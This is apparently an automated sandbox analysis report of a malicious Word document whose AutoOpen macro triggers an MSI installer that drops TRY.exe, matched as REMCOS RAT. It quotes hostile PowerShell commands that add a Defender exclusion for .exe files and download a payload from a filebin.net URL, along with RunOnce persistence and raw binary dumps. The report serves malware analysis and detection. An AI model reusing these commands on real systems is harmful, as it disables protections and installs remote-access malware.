..u}....t@A..D97v......H.U7..H..H.L....`}....u...;7r.....*....]'H.M7...}..H....(~..H.M/...}...E'..............E'...E.......H.MGH3...g..L..$....I.[.I.s.I.{ M.s(I..]........H.\$.WH..0...H..d...H3.H..$ ...I..I..H........t!...u.I......I...w.H....U....P3..Q..q...H..H...F4..H..w...L.D$ A......D$ .........L.D$ .?...H....$.................H..$ ...H3...f..H..$H...H..0..._..........H.\$.H.l$.H.t$.WH.. H..H..H..3...@8+tiH.....H...\_..H..u....H..H...I_..H..u.H...?.t.H..H........,_..H..t.Hc.H...8.t....H..H.\$0H.l$8H.t$@H.. _.3............H.\$.UVWATAUAVAWH..$....H..p...H......H3.H..`...L..H.EPM..H.MPL+.M..E3.M.......H......H..t.A.....t...H..H...u.H..H.A.H.E.D.(.}P"u.H......H.EQ..H......H.EPH.L$0H.D$0.....H.\|$0H...H..H..tlH..H..D8,.u.H...rZ.G..\<:u.8O.t.8.uH:.uDH.D$@L..L+.H.L$@.....H......H..t.A.....t...H..H...u.H..H.A.H.E.D.(.ZA.....L......H.D$@A..L+.H.L$@H......H..t.A.....t...H..H...u.H..H.A.L..A..H.E.H
Source: 54841d.msi.3.dr	Stream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480' : MSCF....l^......,...............}?..D........^.........T.. .TRY.exe..`.(....MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d......&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B........................................................................................................................................................................................................................................................................................................E3.H.B.A.....A.W...I;.E.G.E..xGH..t"L+.L+.I...H..t.A.....t...H..H...u.H..H.A.H.E.H..E..A..A..z........H..t....A.........E3.L..M..H..A.W...I.B.H=....E.G.E..x5I..H..M..t..8.t.H..H...u.H..H..E..A..E#.H..t.M..L+...E3.E..xXI..I...I+.t.H..M......I+.L..L+.M..t.A.....t...I..H..H...u.H..H.B.H.E.H..E..A..A..z......A.........L.D$.L.L$ SVWH.. 3.H.B.H=....H...W....G...x5H.Z.H..H..L.L$X3.........x.H.H;.w.u.@.<3..@.<3.z.....H..t......H.. _^[..........H.\$.H.l$.VWAVH......H..,...H3.H.D$pL..f.D$l..3.H.........l$h......H..H........H......H....1...H..H..taH.D$`A..H.D$PD.E .l$HH.L$h.l$@.}..l$8A. ....l$0...l$(.l$ ...~....t.H.T$`M..3.H........H.L$`...~..H..........H.L$pH3...i..L..$....I.[(I.k0I..A^_^.........H..H.X.H.p.H.x.L.p UH.h.H......H.."...H3.H.EG..Y...E3.D.u?f.EC..D.u'A.^.;...P...H.M'.........&.........H..L.E/.S....~......!...H.M/H.E+E3.H.D$ E3......}.............~....z.......U+3...<...H..H........D.M+H.E+H.M/L....H.D$ ..t}..........H.E7A. ...H.D$PH.M?D.t$HA. ...D.t$@..D.t$8D.t$0D.t$(D.t$ ..u}....t@A..D97v......H.U7..H..H.L....`}....u...;7r.....*....]'H.M7...}..H....(~..H.M/...}...E'..............E'...E.......H.MGH3...g..L..$....I.[.I.s.I.{ M.s(I..]........H.\$.WH..0...H..d...H3.H..$ ...I..I..H........t!...u.I......I...w.H....U....P3..Q..q...H..H...F4..H..w...L.D$ A......D$ .........L.D$ .?...H....$.................H..$ ...H3...f..H..$H...H..0..._..........H.\$.H.l$.H.t$.WH.. H..H..H..3...@8+tiH.....H...\_..H..u....H..H...I_..H..u.H...?.t.H..H........,_..H..t.Hc.H...8.t....H..H.\$0H.l$8H.t$@H.. _.3............H.\$.UVWATAUAVAWH..$....H..p...H......H3.H..`...L..H.EPM..H.MPL+.M..E3.M.......H......H..t.A.....t...H..H...u.H..H.A.H.E.D.(.}P"u.H......H.EQ..H......H.EPH.L$0H.D$0.....H.\|$0H...H..H..tlH..H..D8,.u.H...rZ.G..\<:u.8O.t.8.uH:.uDH.D$@L..L+.H.L$@.....H......H..t.A.....t...H..H...u.H..H.A.H.E.D.(.ZA.....L......H.D$@A..L+.H.L$@H......H..t.A.....t...H..H...u.H..H.A.L..A..H.E.H

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe

Jump to dropped file

Document contains OLE streams with PE executables

Source: MSI94E.tmp.3.dr	Stream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480' : MZ signature found
Source: MSI94E.tmp.3.dr	Stream path '\x17163\x16689\x18229\x16766\x18365\x17932\x17910\x17458\x16778\x17207\x17522\x17357\x18479' : MZ signature found
Source: 54841d.msi.3.dr	Stream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480' : MZ signature found
Source: 54841d.msi.3.dr	Stream path '\x17163\x16689\x18229\x16766\x18365\x17932\x17910\x17458\x16778\x17207\x17522\x17357\x18479' : MZ signature found

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC46028	12_2_00007FF6BAC46028
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC42B24	12_2_00007FF6BAC42B24
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC465B0	12_2_00007FF6BAC465B0
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC43E4C	12_2_00007FF6BAC43E4C
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC41C38	12_2_00007FF6BAC41C38
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC45940	12_2_00007FF6BAC45940
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC433C0	12_2_00007FF6BAC433C0
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC41B44	12_2_00007FF6BAC41B44

Source: ~DF3D7E64A57D9B524A.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: MSI94E.tmp.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFAC439D90DB59E05A.TMP.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 54841d.msi.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF20725BC976A732BA.TMP.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFAB5AE087B19AB60D.TMP.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: inprogressinstallinfo.ipi.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFFFE9197EB1FCF16E.TMP.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF3B9CC377E0CCEDD0.TMP.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TRY.exe.17.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc, type: SAMPLE	Matched rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 date = 2022-02-26, author = Nils Kuhnert, description = Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., reference2 = https://twitter.com/threatinsight/status/1497355737844133895, reference = https://inquest.net/blog/2022/02/24/dangerously-thinbasic, tlp = white
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc, type: SAMPLE	Matched rule: Office_AutoOpen_Macro date = 2015-05-28, hash5 = 7c06cab49b9332962625b16f15708345, hash4 = a3035716fe9173703941876c2bde9d98, hash3 = 66e67c2d84af85a569a04042141164e6, hash2 = 63f6b20cb39630b13c14823874bd3743, author = Florian Roth, description = Detects an Microsoft Office file that contains the AutoOpen Macro function, hash7 = 25285b8fe2c41bd54079c92c1b761381, hash6 = bfc30332b7b91572bfe712b656ea8a0c, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4d00695d5011427efc33c9722c61ced2
Source: C:\Users\user\AppData\Local\Temp\~DF3D7E64A57D9B524A.TMP, type: DROPPED	Matched rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 date = 2022-02-26, author = Nils Kuhnert, description = Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., reference2 = https://twitter.com/threatinsight/status/1497355737844133895, reference = https://inquest.net/blog/2022/02/24/dangerously-thinbasic, tlp = white
Source: C:\Users\user\AppData\Local\Temp\~DF3D7E64A57D9B524A.TMP, type: DROPPED	Matched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI847A.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC429E4 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,		12_2_00007FF6BAC429E4
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC41B44 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,		12_2_00007FF6BAC41B44

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\MSI94E.tmp

Jump to behavior

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen	Name: AutoOpen
Source: ~DF3D7E64A57D9B524A.TMP.0.dr	OLE, VBA macro line: Sub AutoOpen()

Source: bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp.10.dr

Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 289 bytes, 1 file

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	OLE indicator, VBA macros: true
Source: ~DF3D7E64A57D9B524A.TMP.0.dr	OLE indicator, VBA macros: true

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.winDOC@26/45@4/4

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC44478 CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,GetLastError,FormatMessageA,

12_2_00007FF6BAC44478

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC42B24 memset,memset,CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceA,LoadResource,#17,

12_2_00007FF6BAC42B24

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Process created: C:\Windows\System32\cmd.exe cmd /c thai.bat

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	OLE document summary: title field not present or empty
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	OLE document summary: author field not present or empty
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	OLE document summary: edited time not present or 0
Source: ~DF3D7E64A57D9B524A.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DF3D7E64A57D9B524A.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DF3D7E64A57D9B524A.TMP.0.dr	OLE document summary: edited time not present or 0
Source: MSI94E.tmp.3.dr	OLE document summary: edited time not present or 0
Source: ~DFAC439D90DB59E05A.TMP.3.dr	OLE document summary: title field not present or empty
Source: ~DFAC439D90DB59E05A.TMP.3.dr	OLE document summary: author field not present or empty
Source: ~DFAC439D90DB59E05A.TMP.3.dr	OLE document summary: edited time not present or 0
Source: 54841d.msi.3.dr	OLE document summary: edited time not present or 0
Source: ~DF20725BC976A732BA.TMP.3.dr	OLE document summary: title field not present or empty
Source: ~DF20725BC976A732BA.TMP.3.dr	OLE document summary: author field not present or empty
Source: ~DF20725BC976A732BA.TMP.3.dr	OLE document summary: edited time not present or 0
Source: ~DFAB5AE087B19AB60D.TMP.3.dr	OLE document summary: title field not present or empty
Source: ~DFAB5AE087B19AB60D.TMP.3.dr	OLE document summary: author field not present or empty
Source: ~DFAB5AE087B19AB60D.TMP.3.dr	OLE document summary: edited time not present or 0
Source: inprogressinstallinfo.ipi.3.dr	OLE document summary: title field not present or empty
Source: inprogressinstallinfo.ipi.3.dr	OLE document summary: author field not present or empty
Source: inprogressinstallinfo.ipi.3.dr	OLE document summary: edited time not present or 0
Source: ~DFFFE9197EB1FCF16E.TMP.3.dr	OLE document summary: title field not present or empty
Source: ~DFFFE9197EB1FCF16E.TMP.3.dr	OLE document summary: author field not present or empty
Source: ~DFFFE9197EB1FCF16E.TMP.3.dr	OLE document summary: edited time not present or 0
Source: ~DF3B9CC377E0CCEDD0.TMP.3.dr	OLE document summary: title field not present or empty
Source: ~DF3B9CC377E0CCEDD0.TMP.3.dr	OLE document summary: author field not present or empty
Source: ~DF3B9CC377E0CCEDD0.TMP.3.dr	OLE document summary: edited time not present or 0

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	Virustotal: Detection: 37%
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	ReversingLabs: Detection: 24%

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2C09DD3AEE1859E1D48AC181D73EE6A9
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Process created: C:\Windows\System32\cmd.exe cmd /c thai.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-MpPreference -ExclusionExtension ".exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2C09DD3AEE1859E1D48AC181D73EE6A9	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)LOW	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Process created: C:\Windows\System32\cmd.exe cmd /c thai.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-MpPreference -ExclusionExtension ".exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC41B44 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,

12_2_00007FF6BAC41B44

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc

OLE indicator, Word Document stream: true

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{A559FA68-485E-4389-9260-96E7FBE1259F} - OProcSessId.dat

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC46028 LocalAlloc,GetLastError,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA,

12_2_00007FF6BAC46028

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1348:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:632:120:WilError_01

Source: C:\Windows\SysWOW64\msiexec.exe

File written: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\msiwrapper.ini

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: MSI94E.tmp.3.dr

Initial sample: OLE summary template = Intel;1033

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:	Binary string: wextract.pdb source: TRY.exe, 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 0000000C.00000000.465650834.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmp, bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp.10.dr, 54841d.msi.3.dr, MSI94E.tmp.3.dr, files.cab.4.dr
Source:	Binary string: wextract.pdbGCTL source: TRY.exe, 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 0000000C.00000000.465650834.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmp, bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp.10.dr, 54841d.msi.3.dr, MSI94E.tmp.3.dr, files.cab.4.dr
Source:	Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: MSIFECD.tmp.3.dr, MSI1064.tmp.3.dr, MSI847A.tmp.3.dr, 54841d.msi.3.dr, MSI94E.tmp.3.dr

Source: MSI94E.tmp.3.dr

Initial sample: OLE summary keywords = Installer

Source: MSI94E.tmp.3.dr

Initial sample: OLE summary subject = Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com

Source: MSI94E.tmp.3.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC42E28 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,GetLastError,SetCurrentDirectoryA,

12_2_00007FF6BAC42E28

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI847A.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\fd1981f4a71244758e929e11db0d4f1d$dpx$.tmp\bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1064.tmp	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIFECD.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI847A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1064.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIFECD.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC415F8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,

12_2_00007FF6BAC415F8

Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\Logs\DPX\setupact.log			Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\Logs\DPX\setuperr.log			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
